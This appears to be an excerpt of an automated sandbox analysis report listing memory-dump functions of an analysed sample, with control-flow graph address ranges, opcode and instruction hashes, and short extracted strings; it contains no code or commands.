                                                                      • Opcode Fuzzy Hash: 632a849c0f7dedb9b452d32f485e96ddbeffae2c225167d4821bb109811f633e
                                                                      • Instruction Fuzzy Hash: 2F32B130D1C69A8FEB6DDF18C4A56B87BB1FF55340F1445BED44AD7282CA38A981CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10DA8 Relevance: .3, Instructions: 303COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef2bec165820b4ea081b727e6de4295540df039a8a05592d796ae4f2352a9daa
                                                                      • Instruction ID: e61600c79ec2e178be22ceb0fe6bd419cd2067d240c2f525f200b0ae3b23036e
                                                                      • Opcode Fuzzy Hash: ef2bec165820b4ea081b727e6de4295540df039a8a05592d796ae4f2352a9daa
                                                                      • Instruction Fuzzy Hash: 1BB1B871D1DA9A9EE789EB6898253BE7FE1FB9A350F0401BEC049D72D2CB781801C751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D60C7 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 871 7ff8495d60c7-7ff8495d60c9 872 7ff8495d60ae-7ff8495da573 871->872 873 7ff8495d60cb 871->873 896 7ff8495da575 872->896 897 7ff8495da57a-7ff8495da592 872->897 875 7ff8495d60cc-7ff8495d60d9 873->875 876 7ff8495d612b 873->876 880 7ff8495d60be-7ff8495d60c6 875->880 881 7ff8495d60db 875->881 877 7ff8495d612d-7ff8495d6136 876->877 878 7ff8495d618b 876->878 898 7ff8495d613d-7ff8495d6143 877->898 883 7ff8495d618d-7ff8495d6193 878->883 884 7ff8495d61eb-7ff8495d61f1 878->884 880->871 885 7ff8495d60dd-7ff8495da643 881->885 886 7ff8495d613b 881->886 890 7ff8495d6195-7ff8495d619a 883->890 891 7ff8495d61f3-7ff8495d6201 883->891 884->891 894 7ff8495d6186 884->894 904 7ff8495da645 885->904 905 7ff8495da64a-7ff8495da675 885->905 892 7ff8495d619b-7ff8495d61a1 886->892 886->898 890->892 901 7ff8495d6203-7ff8495d6218 891->901 903 7ff8495d61a3 892->903 894->878 896->897 909 7ff8495da598-7ff8495da5a5 897->909 902 7ff8495d6145-7ff8495d6158 898->902 898->903 910 7ff8495d621b 901->910 911 7ff849613cc0-7ff849613cdf 902->911 903->901 906 7ff8495d61a5-7ff8495d61ad 903->906 904->905 905->911 918 7ff8495d61ae-7ff8495d61bb 906->918 914 7ff8495d6265-7ff8495d628b 910->914 915 7ff8495d621c-7ff8495d6240 910->915 916 7ff849613ce1 911->916 917 7ff849613ce6-7ff849613d0f 911->917 926 7ff8495d625d-7ff8495d6262 914->926 927 7ff8495d628d-7ff8495d628e 914->927 919 7ff8495d6243-7ff8495d625c 915->919 916->917 918->910 928 7ff8495d61bd-7ff8495d61c9 918->928 925 7ff8495d6263 919->925 919->926 925->914 926->925 929 7ff8495d62a7-7ff8495d62f6 927->929 930 7ff8495d6290-7ff8495d62a4 927->930 928->918 934 7ff8495d61cc-7ff8495d61e3 928->934 943 7ff8495d6301-7ff8495d6305 929->943 944 7ff8495d62f8-7ff8495d62ff 929->944 930->929 934->919 939 7ff8495d61e5-7ff8495d61ea 934->939 939->884 945 7ff8495d6307-7ff8495d63a3 943->945 946 7ff8495d6322-7ff8495d6349 943->946 944->943 945->943 952 7ff8495d63a9-7ff8495d63ae 945->952 946->943 949 7ff8495d634b-7ff8495d6352 946->949 949->943 952->943
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8zdI$XaeI
                                                                      • API String ID: 0-2109317414
                                                                      • Opcode ID: 7b463f5325f20f9a4e009e55d8d490175036fec983d0565186a781a6fe69f9b1
                                                                      • Instruction ID: e49549c917aaed7b66c1130755c3a2f0195505497a982a713bccacd16333344d
                                                                      • Opcode Fuzzy Hash: 7b463f5325f20f9a4e009e55d8d490175036fec983d0565186a781a6fe69f9b1
                                                                      • Instruction Fuzzy Hash: B6C1B03180DA8D8FDB55EF68D855AEE7BB0FF65344F14427AD018CB292DA38A585CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D4ED7 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HJ@I$HJ@I
                                                                      • API String ID: 0-3218539128
                                                                      • Opcode ID: a35513a7d28c708f1f44250a12cbb89ffd84d95ef68b6d8f02001a587663184e
                                                                      • Instruction ID: 26428f123773196777bb6ce93ab95ab52b1d5cdb188346edaf9066d1ded73366
                                                                      • Opcode Fuzzy Hash: a35513a7d28c708f1f44250a12cbb89ffd84d95ef68b6d8f02001a587663184e
                                                                      • Instruction Fuzzy Hash: 0F212816D0E6D7DEFE757A7828221BC2A5CAF91795F2803BAC84D460CBDD0CE88543D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D47FA Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 985 7ff8490d47fa-7ff8490d4923 call 7ff8490cef58 1004 7ff8490d4929-7ff8490d492d 985->1004
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2$pL@I
                                                                      • API String ID: 0-569896136
                                                                      • Opcode ID: be7e43579e94d8b5221d7de02e4bf33533ee77f74a6f9f6a8adcdd63a0e8d452
                                                                      • Instruction ID: ef38bef476ca2c2d606f67fd51ea7e56480038d9846ef04d02dbb0bc306ec8ab
                                                                      • Opcode Fuzzy Hash: be7e43579e94d8b5221d7de02e4bf33533ee77f74a6f9f6a8adcdd63a0e8d452
                                                                      • Instruction Fuzzy Hash: 38418132D0E6DA9FDB66DB7898600EC7FB0EF56280B1801BBD049D71D3DA18990AC751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D3F95 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1007 7ff8490d3f95-7ff8490d7fd0 1010 7ff8490d7fdb-7ff8490d8071 1007->1010 1013 7ff8490d7ff6-7ff8490d8076 1010->1013 1014 7ff8490d807c-7ff8490d853f 1010->1014 1013->1014 1018 7ff8490d8018-7ff8490d8078 1013->1018 1018->1014 1023 7ff8490d803c-7ff8490d807a 1018->1023 1023->1014 1029 7ff8490d805d-7ff8490d8070 1023->1029
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HJ@I$hn@I
                                                                      • API String ID: 0-547439482
                                                                      • Opcode ID: 634f5373a7f8b1d6a3a183a848250bfd738a0e03d1f7a5ff70a17d617c1175d9
                                                                      • Instruction ID: ed27d1d6e579f3757a099ce198ddc79bc432b00bde5fa7884b8d2a3a7c0aa32c
                                                                      • Opcode Fuzzy Hash: 634f5373a7f8b1d6a3a183a848250bfd738a0e03d1f7a5ff70a17d617c1175d9
                                                                      • Instruction Fuzzy Hash: 83411630D1C59A8FEBB8EA1888647B87BA5FF94341F1446B9C44EC7187DE38B9858780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CB552 Relevance: 1.8, Strings: 1, Instructions: 584COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1031 7ff8490cb552-7ff8490cb559 1032 7ff8490cb775-7ff8490cb786 1031->1032 1033 7ff8490cb55f-7ff8490cb591 call 7ff8490cb2f0 call 7ff8490cb1c0 1031->1033 1035 7ff8490cb78d-7ff8490cb798 1032->1035 1036 7ff8490cb788 1032->1036 1033->1032 1040 7ff8490cb597-7ff8490cb5be call 7ff8490cb2f0 1033->1040 1036->1035 1044 7ff8490cb5c0-7ff8490cb5e9 call 7ff8490cb1c0 1040->1044 1045 7ff8490cb5f3-7ff8490cb634 call 7ff8490cb2f0 1040->1045 1044->1032 1052 7ff8490cb5ef-7ff8490cb5f2 1044->1052 1055 7ff8490cb6a4-7ff8490cb6af 1045->1055 1056 7ff8490cb636-7ff8490cb64a call 7ff8490cb1c0 1045->1056 1052->1045 1059 7ff8490cb6b1-7ff8490cb6bb 1055->1059 1060 7ff8490cb71f 1055->1060 1056->1032 1062 7ff8490cb650-7ff8490cb673 call 7ff8490cb2f0 1056->1062 1065 7ff8490cb6c2-7ff8490cb6e0 1059->1065 1063 7ff8490cb725-7ff8490cb72a 1060->1063 1070 7ff8490cb845-7ff8490cb85c 1062->1070 1071 7ff8490cb679-7ff8490cb689 1062->1071 1066 7ff8490cb6e2-7ff8490cb702 1063->1066 1067 7ff8490cb72c-7ff8490cb72e 1063->1067 1077 7ff8490cb719-7ff8490cb71e 1065->1077 1066->1070 1073 7ff8490cb708-7ff8490cb713 1066->1073 1067->1032 1069 7ff8490cb730-7ff8490cb733 1067->1069 1074 7ff8490cb735 1069->1074 1075 7ff8490cb739-7ff8490cb754 1069->1075 1084 7ff8490cb85e 1070->1084 1085 7ff8490cb85f-7ff8490cb86d 1070->1085 1071->1070 1076 7ff8490cb68f-7ff8490cb6a2 1071->1076 1073->1077 1078 7ff8490cb7fb-7ff8490cb80f 1073->1078 1074->1075 1075->1070 1079 7ff8490cb75a-7ff8490cb773 call 7ff8490cb1c0 1075->1079 1076->1055 1076->1056 1077->1060 1080 7ff8490cb816-7ff8490cb821 1078->1080 1081 7ff8490cb811 1078->1081 1079->1032 1091 7ff8490cb799-7ff8490cb7b2 call 7ff8490cb2f0 1079->1091 1081->1080 1084->1085 1087 7ff8490cb875 1085->1087 1088 7ff8490cb86f 1085->1088 1089 7ff8490cb877 1087->1089 1090 7ff8490cb879-7ff8490cb889 1087->1090 1088->1087 1089->1090 1092 7ff8490cb8b9 1089->1092 1093 7ff8490cb8c8-7ff8490cbafa 1090->1093 1094 7ff8490cb88b-7ff8490cb8b8 1090->1094 1091->1070 1101 7ff8490cb7b8-7ff8490cb7bf 1091->1101 1097 7ff8490cb8ba-7ff8490cb8c6 1092->1097 1104 7ff8490cba6e-7ff8490cba73 1093->1104 1105 7ff8490cb8d8-7ff8490cb8df 1093->1105 1094->1092 1094->1097 1097->1093 1102 7ff8490cb7e9-7ff8490cb7f1 1101->1102 1107 7ff8490cb7c1-7ff8490cb7dd 1102->1107 1108 7ff8490cb7f3-7ff8490cb7f9 1102->1108 1106 7ff8490cba9c-7ff8490cbaa2 1104->1106 1109 7ff8490cb8e5-7ff8490cb8ea 1105->1109 1110 7ff8490cbaff-7ff8490cbb02 1105->1110 1112 7ff8490cbaa9-7ff8490cbaaf 1106->1112 1107->1070 1111 7ff8490cb7df-7ff8490cb7e7 1107->1111 1108->1078 1113 7ff8490cb822 1108->1113 1114 7ff8490cb9f6 1109->1114 1115 7ff8490cb8f0-7ff8490cb92e 1109->1115 1120 7ff8490cbb33-7ff8490cbb39 1110->1120 1111->1102 1116 7ff8490cba75-7ff8490cba8e 1112->1116 1117 7ff8490cbab1-7ff8490cbab6 1112->1117 1113->1070 1118 7ff8490cba1f-7ff8490cba26 1114->1118 1115->1120 1121 7ff8490cba94-7ff8490cba99 1116->1121 1122 7ff8490cbb85-7ff8490cbb95 1116->1122 1123 7ff8490cb9a3 1117->1123 1124 7ff8490cbabc-7ff8490cbaf1 1117->1124 1125 7ff8490cb9f8-7ff8490cba11 1118->1125 1126 7ff8490cba28-7ff8490cba40 1118->1126 1121->1106 1136 7ff8490cbb97 1122->1136 1137 7ff8490cbb98-7ff8490cbba9 1122->1137 1127 7ff8490cb9d1-7ff8490cb9e8 1123->1127 1125->1122 1128 7ff8490cba17-7ff8490cba1c 1125->1128 1135 7ff8490cba48-7ff8490cba6b 1126->1135 1127->1112 1131 7ff8490cb9ee-7ff8490cb9f4 1127->1131 1128->1118 1131->1114 1133 7ff8490cb9a5 1131->1133 1133->1127 1140 7ff8490cbb78-7ff8490cbb7d 1133->1140 1135->1104 1136->1137 1138 7ff8490cbbe8-7ff8490cbc09 1137->1138 1139 7ff8490cbbab-7ff8490cbbe6 1137->1139 1148 7ff8490cbc48-7ff8490cbc4b 1138->1148 1149 7ff8490cbc0b-7ff8490cbc47 1138->1149 1140->1122 1151 7ff8490cbc50-7ff8490cbc57 1148->1151 1149->1148 1151->1151 1154 7ff8490cbc59-7ff8490cbfe6 1151->1154
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 21731560787ee5f4d6acdd65a3b93dce1a1e64fa0269023a28e840696c232da5
                                                                      • Instruction ID: 4dc55633bbb2ce0c438be9ffc5800361717813beed3d6fa7ed4d0ab605b79d99
                                                                      • Opcode Fuzzy Hash: 21731560787ee5f4d6acdd65a3b93dce1a1e64fa0269023a28e840696c232da5
                                                                      • Instruction Fuzzy Hash: A612B23090CA8A9FEB6DEF68C4516B9BBA1FF55340F14417AD44EC7686CB38E845CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C2295 Relevance: 1.8, Instructions: 1809COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1157 7ff8495c2295-7ff8495c22a3 1159 7ff8495c38ca-7ff8495c38e8 call 7ff8495c3a6d call 7ff8495c3abd 1157->1159 1160 7ff8495c22a9-7ff8495c2333 1157->1160 1172 7ff8495c2335-7ff8495c2368 1160->1172 1173 7ff8495c236d-7ff8495c244c 1160->1173 1176 7ff8495c2452-7ff8495c24ed 1172->1176 1173->1176 1188 7ff8495c2527-7ff8495c2606 1176->1188 1189 7ff8495c24ef-7ff8495c2522 1176->1189 1192 7ff8495c260c-7ff8495c26a7 1188->1192 1189->1192 1204 7ff8495c26b3-7ff8495c273b 1192->1204 1205 7ff8495c26a9-7ff8495c27ef 1192->1205 1214 7ff8495c273e-7ff8495c2754 1204->1214 1217 7ff8495c27f1-7ff8495c27f6 1205->1217 1218 7ff8495c27fb-7ff8495c28a3 1205->1218 1219 7ff8495c28a4-7ff8495c2937 1217->1219 1218->1219 1229 7ff8495c2971-7ff8495c2a50 1219->1229 1230 7ff8495c2939-7ff8495c296c 1219->1230 1234 7ff8495c2a56-7ff8495c2af1 1229->1234 1230->1234 1246 7ff8495c2af3-7ff8495c2b26 1234->1246 1247 7ff8495c2b2b-7ff8495c2c23 1234->1247 1250 7ff8495c2ca1-7ff8495c2d3c 1246->1250 1266 7ff8495c2c2c-7ff8495c2c9b 1247->1266 1263 7ff8495c2d76-7ff8495c2ee6 1250->1263 1264 7ff8495c2d3e-7ff8495c2d71 1250->1264 1269 7ff8495c2eec-7ff8495c2f87 1263->1269 1264->1269 1266->1250 1283 7ff8495c2fc1-7ff8495c30a0 1269->1283 1284 7ff8495c2f89-7ff8495c2fbc 1269->1284 1289 7ff8495c30a6-7ff8495c3141 1283->1289 1284->1289 1302 7ff8495c3143-7ff8495c3176 1289->1302 1303 7ff8495c317b-7ff8495c325a 1289->1303 1306 7ff8495c3260-7ff8495c32fb 1302->1306 1303->1306 1318 7ff8495c3335-7ff8495c34a5 1306->1318 1319 7ff8495c32fd-7ff8495c3330 1306->1319 1322 7ff8495c34ab-7ff8495c3546 1318->1322 1319->1322 1334 7ff8495c3580-7ff8495c36f0 1322->1334 1335 7ff8495c3548-7ff8495c357b 1322->1335 1340 7ff8495c36f6-7ff8495c3791 1334->1340 1335->1340 1355 7ff8495c3793-7ff8495c3798 1340->1355 1356 7ff8495c379d-7ff8495c38be 1340->1356 1357 7ff8495c38c1-7ff8495c38c4 1355->1357 1356->1357 1357->1159
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6744aa3b2d5001f0ad66b525643ca851a020af918879a2a941b684d561cd8956
                                                                      • Instruction ID: 39b55f08ad9f5822b39384fe477b2e5d2f7dffeb615f4ae1366c9e5431d5a8fe
                                                                      • Opcode Fuzzy Hash: 6744aa3b2d5001f0ad66b525643ca851a020af918879a2a941b684d561cd8956
                                                                      • Instruction Fuzzy Hash: 96F26670A4895D8FDF98EF18D894FA9B7B1FB69301F1401E9900EE7691DA35AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CDFF9 Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1369 7ff8490cdff9-7ff8490ce00f 1370 7ff8490ce011-7ff8490ce034 1369->1370 1371 7ff8490ce351-7ff8490ce35b 1370->1371 1372 7ff8490ce03a-7ff8490ce03f 1370->1372 1379 7ff8490ce35c-7ff8490ce3ce 1371->1379 1373 7ff8490ce041-7ff8490ce044 1372->1373 1374 7ff8490ce04b-7ff8490ce064 1372->1374 1373->1374 1375 7ff8490ce066-7ff8490ce071 1374->1375 1376 7ff8490ce078-7ff8490ce0a5 1374->1376 1375->1370 1376->1379 1381 7ff8490ce0ab-7ff8490ce0b6 1376->1381 1400 7ff8490ce3d0-7ff8490ce3d6 1379->1400 1401 7ff8490ce3eb-7ff8490ce3fc 1379->1401 1384 7ff8490ce174-7ff8490ce179 1381->1384 1385 7ff8490ce0bc-7ff8490ce0ca 1381->1385 1387 7ff8490ce20d-7ff8490ce217 1384->1387 1388 7ff8490ce17f-7ff8490ce189 1384->1388 1385->1379 1389 7ff8490ce0d0-7ff8490ce0e1 1385->1389 1391 7ff8490ce239-7ff8490ce240 1387->1391 1392 7ff8490ce219-7ff8490ce224 1387->1392 1388->1379 1390 7ff8490ce18f-7ff8490ce1a3 1388->1390 1393 7ff8490ce0e3-7ff8490ce106 1389->1393 1394 7ff8490ce149-7ff8490ce160 1389->1394 1397 7ff8490ce243-7ff8490ce24d 1390->1397 1391->1397 1412 7ff8490ce22b-7ff8490ce237 1392->1412 1398 7ff8490ce10c-7ff8490ce11f 1393->1398 1399 7ff8490ce1a8-7ff8490ce1ad 1393->1399 1394->1379 1395 7ff8490ce166-7ff8490ce16e 1394->1395 1395->1384 1395->1385 1397->1379 1404 7ff8490ce253-7ff8490ce26b 1397->1404 1402 7ff8490ce123-7ff8490ce147 1398->1402 1399->1402 1406 7ff8490ce431-7ff8490ce490 1400->1406 1407 7ff8490ce3d8-7ff8490ce3e9 1400->1407 1408 7ff8490ce40d-7ff8490ce430 1401->1408 1409 7ff8490ce3fe-7ff8490ce40b 1401->1409 1402->1394 1416 7ff8490ce1b2-7ff8490ce1b5 1402->1416 1404->1379 1410 7ff8490ce271-7ff8490ce289 1404->1410 1445 7ff8490ce496-7ff8490ce4e8 1406->1445 1407->1400 1407->1401 1409->1408 1410->1379 1414 7ff8490ce28f-7ff8490ce2c3 1410->1414 1412->1391 1414->1379 1437 7ff8490ce2c9-7ff8490ce2dc 1414->1437 1420 7ff8490ce1b7-7ff8490ce1c7 1416->1420 1421 7ff8490ce1cb-7ff8490ce1d8 1416->1421 1420->1421 1421->1379 1423 7ff8490ce1de-7ff8490ce20c 1421->1423 1439 7ff8490ce2de-7ff8490ce2e9 1437->1439 1440 7ff8490ce33f-7ff8490ce350 1437->1440 1439->1440 1443 7ff8490ce2eb-7ff8490ce302 1439->1443 1447 7ff8490ce304-7ff8490ce311 1443->1447 1448 7ff8490ce313-7ff8490ce335 1443->1448 1460 7ff8490ce4ea-7ff8490ce4f1 1445->1460 1447->1448 1448->1440
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: ea3d649c113528675ed277f70101e8f628b41780812ecc6fbb28a45663460a94
                                                                      • Instruction ID: fa6cf86d7b679d0c9579031614349c4d5fe4d25d8369171607c88fb4c093f75a
                                                                      • Opcode Fuzzy Hash: ea3d649c113528675ed277f70101e8f628b41780812ecc6fbb28a45663460a94
                                                                      • Instruction Fuzzy Hash: 98020F3091EA868FDB59EF2894895B677E0FF95344B1442BAD44DCB293DE28EC42C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CAEA8 Relevance: 1.8, Strings: 1, Instructions: 505COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1462 7ff8495caea8-7ff8495caeaa 1463 7ff8495caeac-7ff8495caec2 1462->1463 1464 7ff8495caf0a 1462->1464 1465 7ff8495cc153-7ff8495cc17d 1463->1465 1466 7ff8495caf0c-7ff8495caf1a 1464->1466 1467 7ff8495caf1e-7ff8495cafd2 1464->1467 1468 7ff8495cc1bd-7ff8495cc1ed 1465->1468 1466->1468 1477 7ff8495cafdb-7ff8495cb00d 1467->1477 1478 7ff8495cb016-7ff8495cb023 1477->1478 1480 7ff8495cb02e-7ff8495cb05e 1478->1480 1481 7ff8495cb067-7ff8495cb0a0 1480->1481 1484 7ff8495cb0ab-7ff8495cb0df 1481->1484 1485 7ff8495cb0e8-7ff8495cb112 1484->1485 1486 7ff8495cb11b-7ff8495cb14d 1485->1486 1487 7ff8495cb156-7ff8495cb170 1486->1487 1489 7ff8495cb176-7ff8495cb245 1487->1489 1490 7ff8495cb248-7ff8495cb260 1487->1490 1489->1490 1493 7ff8495cb26b-7ff8495cb29f 1490->1493 1495 7ff8495cb2a8-7ff8495cb2d2 1493->1495 1498 7ff8495cb2db-7ff8495cb30d 1495->1498 1500 7ff8495cb316-7ff8495cb31f 1498->1500 1501 7ff8495cb321-7ff8495cb326 1500->1501 1502 7ff8495cb388-7ff8495cb403 call 7ff8495cc21d 1500->1502 1501->1502 1504 7ff8495cb328-7ff8495cb381 1501->1504 1515 7ff8495cb40c-7ff8495cb45a 1502->1515 1504->1502 1517 7ff8495cb463-7ff8495cb482 1515->1517 1517->1465
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _^H
                                                                      • API String ID: 0-842449272
                                                                      • Opcode ID: 6e1a7c88fd26d9b78ca3204d0c3a30ee51c1ad8544de39e6c0ccfc32085edd89
                                                                      • Instruction ID: 1d2bb6f962d03ea93e07c25972e2f7059bc689a275cb7628157773f0db73895a
                                                                      • Opcode Fuzzy Hash: 6e1a7c88fd26d9b78ca3204d0c3a30ee51c1ad8544de39e6c0ccfc32085edd89
                                                                      • Instruction Fuzzy Hash: C1127970A4895D8FDF99EF18C898BA9B7B5FB68701F1041E9D00DE7291CA35AE85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CAF1F Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1580 7ff8495caf1f-7ff8495cb170 1599 7ff8495cb176-7ff8495cb245 1580->1599 1600 7ff8495cb248-7ff8495cb31f 1580->1600 1599->1600 1611 7ff8495cb321-7ff8495cb326 1600->1611 1612 7ff8495cb388-7ff8495cb45a call 7ff8495cc21d 1600->1612 1611->1612 1614 7ff8495cb328-7ff8495cb381 1611->1614 1627 7ff8495cb463-7ff8495cc1ed 1612->1627 1614->1612
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _^H
                                                                      • API String ID: 0-842449272
                                                                      • Opcode ID: 044542eb1c8fc1e2f8cb7ccd1802cc999c2037f81250172529b66fb778b14a61
                                                                      • Instruction ID: 3c1062990378ec5edb659c94eb25f7fec0061380b42bff6d973b830919492326
                                                                      • Opcode Fuzzy Hash: 044542eb1c8fc1e2f8cb7ccd1802cc999c2037f81250172529b66fb778b14a61
                                                                      • Instruction Fuzzy Hash: 78028970A4895D8FDF99EF18C898BA9B7B5FB68701F1041E9D00DE7291CA35AE85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CCCE1 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1645 7ff8490ccce1 1646 7ff8490ccce6-7ff8490cccee 1645->1646 1647 7ff8490cccf4-7ff8490ccd06 call 7ff8490cc6b0 1646->1647 1648 7ff8490cce71-7ff8490cce85 1646->1648 1653 7ff8490cccd5-7ff8490cccdc 1647->1653 1654 7ff8490ccd08-7ff8490ccd0d 1647->1654 1650 7ff8490cce87 1648->1650 1651 7ff8490cce8c-7ff8490cce97 1648->1651 1650->1651 1657 7ff8490cceb0-7ff8490cceb5 1653->1657 1655 7ff8490ccd2f-7ff8490ccd40 1654->1655 1656 7ff8490ccd0f-7ff8490ccd13 1654->1656 1660 7ff8490ccd46-7ff8490ccd5b 1655->1660 1661 7ff8490cceba-7ff8490cced5 1655->1661 1658 7ff8490cce13-7ff8490cce24 1656->1658 1659 7ff8490ccd19-7ff8490ccd2a 1656->1659 1657->1645 1663 7ff8490cce26 1658->1663 1664 7ff8490cce2b-7ff8490cce36 1658->1664 1659->1648 1660->1661 1662 7ff8490ccd61-7ff8490ccd6d 1660->1662 1669 7ff8490cced7 1661->1669 1670 7ff8490ccedd 1661->1670 1666 7ff8490ccd9e-7ff8490ccdb4 call 7ff8490cc6b0 1662->1666 1667 7ff8490ccd6f-7ff8490ccd86 call 7ff8490cb1c0 1662->1667 1663->1664 1666->1658 1676 7ff8490ccdb6-7ff8490ccdc1 1666->1676 1667->1658 1678 7ff8490ccd8c-7ff8490ccd9b call 7ff8490cb2f0 1667->1678 1669->1670 1673 7ff8490ccee1-7ff8490ccf43 1670->1673 1674 7ff8490ccedf 1670->1674 1692 7ff8490ccf4e-7ff8490ccf6c 1673->1692 1693 7ff8490ccf0b-7ff8490ccf47 1673->1693 1674->1673 1677 7ff8490ccf21-7ff8490ccf23 1674->1677 1676->1661 1680 7ff8490ccdc7-7ff8490ccddc 1676->1680 1681 